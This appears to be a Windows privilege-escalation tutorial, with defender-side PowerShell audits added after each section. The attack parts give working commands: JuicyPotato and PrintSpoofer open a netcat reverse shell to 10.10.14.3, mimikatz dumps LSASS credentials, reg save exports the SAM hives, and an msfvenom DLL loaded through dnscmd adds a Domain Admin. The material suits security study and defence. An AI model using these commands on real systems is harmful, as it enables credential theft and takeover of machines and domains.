Windows Privilege Escalation — Deep Dive
This post covers Windows privilege escalation techniques: enumeration commands and exploitation paths for commonly abused privileges such as SeImpersonatePrivilege, SeDebugPrivilege and SeTakeOwnershipPrivilege, for group memberships such as Backup Operators and DnsAdmins, and more.
1. Gathering System Information
Network & System Information
Network Configuration:
ipconfig /all
arp -a
route print
Service Information:
tasklist /svc
netstat -ano
System Info:
systeminfo
wmic product get name
Get-WmiObject -Class Win32_Product | select Name, Version
2. User & Privilege Enumeration
Current User & Privileges:
whoami /priv
whoami /groups
net user
query user
Groups & Password Policies:
net localgroup
net localgroup "Backup Operators"
net accounts
3. Security Tools & Configuration
Windows Defender:
Get-MpComputerStatus
AppLocker:
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Test-AppLockerPolicy -Path C:\Windows\System32\cmd.exe -User Everyone
4. Named Pipes & Permission Enumeration
List Named Pipes:
pipelist.exe /accepteula
Check Access Rights:
accesschk.exe /accepteula \\.\Pipe\lsass -v
accesschk.exe /accepteula -w \\.\Pipe\SQLLocal\SQLEXPRESS01 -v
5. Environment Variables & Useful Commands
set
User Privileges
whoami /priv
Critical privileges to look for:
- SeBackupPrivilege
- SeRestorePrivilege
- SeTakeOwnershipPrivilege
- SeImpersonatePrivilege
- SeDebugPrivilege
Exploiting SeImpersonatePrivilege
Check privilege:
whoami /priv
1. JuicyPotato Exploit
nc -lnvp 8443
JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
2. PrintSpoofer
PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
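Added defender-side example (not part of the original post) covering both the list of critical privileges above and the SeImpersonatePrivilege section: it parses the current token's `whoami /priv` output to show which of those privileges the account holds, and, when run from an elevated shell, exports the User Rights Assignment part of the local security policy with `secedit` to show which principals are granted them machine-wide. It assumes an English-locale Windows (the State column of `whoami /priv` is localized); the `$criticalPrivileges` list and the temp file name are this example's own choices.

```powershell
# Added example, not from the original post. Audits the five critical privileges
# on the current token and, if elevated, in the local security policy.
$criticalPrivileges = @(
    'SeBackupPrivilege', 'SeRestorePrivilege', 'SeTakeOwnershipPrivilege',
    'SeImpersonatePrivilege', 'SeDebugPrivilege'
)

function Get-TokenPrivileges {
    # `whoami /priv` prints a fixed-width table: Privilege Name, Description, State.
    # A Disabled privilege is still held: the process can enable it itself, so both states count.
    foreach ($line in (whoami /priv)) {
        if ($line -match '^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$') {
            [pscustomobject]@{
                Name     = $matches[1]
                State    = $matches[3]
                Critical = ($criticalPrivileges -contains $matches[1])
            }
        }
    }
}

function Get-PrivilegeAssignments {
    # Export the User Rights Assignment section (requires an elevated shell) and
    # resolve each SID listed for a critical privilege to an account name.
    $cfg = Join-Path $env:TEMP 'secpol-audit.inf'   # temp file name is an assumption
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    if (-not (Test-Path $cfg)) { throw 'secedit export failed; run from an elevated prompt.' }
    try {
        foreach ($line in (Get-Content -Path $cfg)) {
            if ($line -match '^(Se\w+)\s*=\s*(.+)$' -and $criticalPrivileges -contains $matches[1]) {
                $priv = $matches[1]
                $principals = $matches[2].Split(',') | ForEach-Object {
                    $id = $_.Trim().TrimStart('*')   # entries look like *S-1-5-32-544
                    try {
                        (New-Object System.Security.Principal.SecurityIdentifier($id)).Translate(
                            [System.Security.Principal.NTAccount]).Value
                    } catch { $id }   # keep the raw SID if it cannot be resolved (orphaned account)
                }
                [pscustomobject]@{ Privilege = $priv; AssignedTo = ($principals -join ', ') }
            }
        }
    } finally {
        Remove-Item -Path $cfg -ErrorAction SilentlyContinue
    }
}

'--- Current token ---'
Get-TokenPrivileges | Where-Object Critical | Format-Table -AutoSize

$identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$isAdmin  = ([Security.Principal.WindowsPrincipal]$identity).IsInRole(
    [Security.Principal.WindowsBuiltInRole]::Administrator)
if ($isAdmin) {
    '--- Machine-wide assignment (local security policy) ---'
    Get-PrivilegeAssignments | Format-Table -AutoSize
}
```

The machine-wide view is the one that matters for hardening: SeImpersonatePrivilege is granted by default to service accounts such as LOCAL SERVICE, NETWORK SERVICE and IIS_IUSRS, so any application pool or service running as one of them is an impersonation candidate; the audit is useful for spotting principals that have been added beyond that default set.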
Exploiting SeDebugPrivilege
Check privilege:
whoami /priv
1. Dumping LSASS
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
2. RCE via SYSTEM Token (psgetsystem)
tasklist
. .\psgetsys.ps1
ImpersonateFromParentPid -ppid 612 -command "cmd.exe"
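Added defender-side example for the LSASS dump path above (not part of the original post). It reports whether LSA runs as a protected process (the RunAsPPL value under the Lsa key) and hunts Sysmon ProcessAccess events (Event ID 10) for processes that opened a handle to lsass.exe. The hunt is written generally, so the same function can be pointed at any target image, including the SYSTEM process a token-stealing tool opens. It assumes Sysmon is installed with a ProcessAccess rule; without it the event query returns nothing. The `$AllowedSources` list is an assumption to be filled with the paths of security products that legitimately open LSASS.

```powershell
# Added example, not from the original post. Checks LSA protection and reviews
# Sysmon Event ID 10 (ProcessAccess) for handles opened to lsass.exe.

function Get-LsaProtectionStatus {
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $value = (Get-ItemProperty -Path $key -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
    [pscustomobject]@{
        RunAsPPL     = $value
        # 1 = enabled with UEFI lock, 2 = enabled without UEFI lock; absent or 0 = not protected
        LsaProtected = ($null -ne $value -and $value -ge 1)
    }
}

function Get-ProcessAccessEvents {
    param(
        [string]$TargetPattern  = '\\lsass\.exe$',   # regex applied to the TargetImage field
        [int]$Hours             = 24,
        [string[]]$AllowedSources = @()              # full paths of tools expected to touch the target
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 10
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Read the EventData fields from the event XML instead of parsing the message text.
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data['TargetImage'] -notmatch $TargetPattern) { continue }
        if ($AllowedSources -contains $data['SourceImage']) { continue }
        [pscustomobject]@{
            Time          = $e.TimeCreated
            SourceImage   = $data['SourceImage']
            SourcePid     = $data['SourceProcessId']
            GrantedAccess = $data['GrantedAccess']
            TargetImage   = $data['TargetImage']
        }
    }
}

Get-LsaProtectionStatus
Get-ProcessAccessEvents -Hours 72 | Sort-Object Time -Descending | Format-Table -AutoSize
```

When triaging the output, the GrantedAccess mask is the key field: writing a minidump needs at least PROCESS_QUERY_INFORMATION and PROCESS_VM_READ (0x0410), so masks that include those bits from a SourceImage that is not a known security product deserve a closer look. Enabling LSA protection blocks the unsigned-tool dump path entirely, which is why the first check comes first.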
Exploiting SeTakeOwnershipPrivilege
takeown /F C:\Windows\System32\drivers\etc\hosts
icacls C:\Windows\System32\drivers\etc\hosts /grant user:F
Registry takeover example:
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "key" -Value "value"
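Added defender-side example for the SeTakeOwnershipPrivilege section (not part of the original post). It checks whether ownership of, or write access to, a set of protected files has drifted away from the expected system principals, which is exactly the change the `takeown`/`icacls` pair above produces, and lists what is registered under the HKLM Run key used in the registry example. The default path list (only the hosts file) and the `$expectedPrincipals` set are assumptions to be replaced with your own baseline.

```powershell
# Added example, not from the original post. Flags unexpected owners or writers on
# protected files and lists HKLM Run key entries.

$expectedPrincipals = @('NT SERVICE\TrustedInstaller', 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators')

function Test-ProtectedFileAcl {
    param([string[]]$Path = @("$env:SystemRoot\System32\drivers\etc\hosts"))
    # Any of these rights lets a principal change the file or its ACL. Generic rights
    # (GENERIC_WRITE etc.) in inherited ACEs are not expanded here.
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Delete -bor
                 [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
                 [System.Security.AccessControl.FileSystemRights]::ChangePermissions
    foreach ($p in $Path) {
        $acl = Get-Acl -Path $p
        $unexpectedWriters = $acl.Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                ([int]($_.FileSystemRights -band $writeMask) -ne 0) -and
                ($expectedPrincipals -notcontains $_.IdentityReference.Value)
            } |
            ForEach-Object { "$($_.IdentityReference.Value) [$($_.FileSystemRights)]" }
        [pscustomobject]@{
            Path              = $p
            Owner             = $acl.Owner
            OwnerExpected     = ($expectedPrincipals -contains $acl.Owner)
            UnexpectedWriters = ($unexpectedWriters -join '; ')
        }
    }
}

function Get-RunKeyEntries {
    $key   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    $props = Get-ItemProperty -Path $key
    # Get-ItemProperty adds PSPath/PSParentPath/... metadata; skip those, keep the real values.
    $props.PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' } |
        ForEach-Object { [pscustomobject]@{ Name = $_.Name; Command = $_.Value } }
}

Test-ProtectedFileAcl | Format-List
Get-RunKeyEntries | Format-Table -AutoSize
```

A non-empty UnexpectedWriters column, or an owner that is an ordinary user account, is the signal to compare against a known-good image; the Run key listing is there because the same privilege is what lets an attacker take over an otherwise protected HKLM key.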
Group Privileges
Administrators Group
net localgroup administrators
Backup Operators
reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system
reg save hklm\security c:\temp\security
DnsAdmins Exploitation
msfvenom -p windows/x64/exec cmd='net group "Domain Admins" netadm /add /domain' -f dll -o adduser.dll
dnscmd.exe /config /serverlevelplugindll adduser.dll
sc.exe stop dns
sc.exe start dns
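Added defender-side example for the Group Privileges section (not part of the original post). It lists the members of the local Administrators and Backup Operators groups, the members of the domain DnsAdmins group when the ActiveDirectory module (RSAT) is present, and whether the DNS service has a ServerLevelPluginDll value configured, which is the registry value that `dnscmd /config /serverlevelplugindll` writes. The local group names are taken from the sections above; the script assumes it runs on the DNS server or domain controller being audited.

```powershell
# Added example, not from the original post. Audits privileged group membership
# and the DNS server plugin DLL setting.

function Get-SensitiveGroupMembers {
    param([string[]]$LocalGroups = @('Administrators', 'Backup Operators'))
    foreach ($g in $LocalGroups) {
        Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue | ForEach-Object {
            [pscustomobject]@{
                Group  = $g
                Member = $_.Name
                Type   = $_.ObjectClass
                Source = $_.PrincipalSource
            }
        }
    }
    # DnsAdmins is a domain group, so it needs the AD module rather than the local-accounts cmdlets.
    if (Get-Command Get-ADGroupMember -ErrorAction SilentlyContinue) {
        Get-ADGroupMember -Identity 'DnsAdmins' -Recursive -ErrorAction SilentlyContinue | ForEach-Object {
            [pscustomobject]@{
                Group  = 'DnsAdmins'
                Member = $_.SamAccountName
                Type   = $_.objectClass
                Source = 'ActiveDirectory'
            }
        }
    }
}

function Test-DnsServerPluginDll {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    $dll = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
    [pscustomobject]@{
        ServerLevelPluginDll = $dll
        # A healthy DNS server has no plugin DLL configured at all.
        PluginConfigured     = -not [string]::IsNullOrEmpty($dll)
        DllExists            = [bool]($dll -and (Test-Path -LiteralPath $dll))
    }
}

Get-SensitiveGroupMembers | Format-Table -AutoSize
Test-DnsServerPluginDll
```

Membership in Backup Operators or DnsAdmins is effectively administrative on the host, as the commands above show, so both lists should be as short as the Administrators list and reviewed on the same schedule. A ServerLevelPluginDll value that is set at all, and especially one pointing at a UNC path or a recently created file, is worth treating as an incident rather than a misconfiguration.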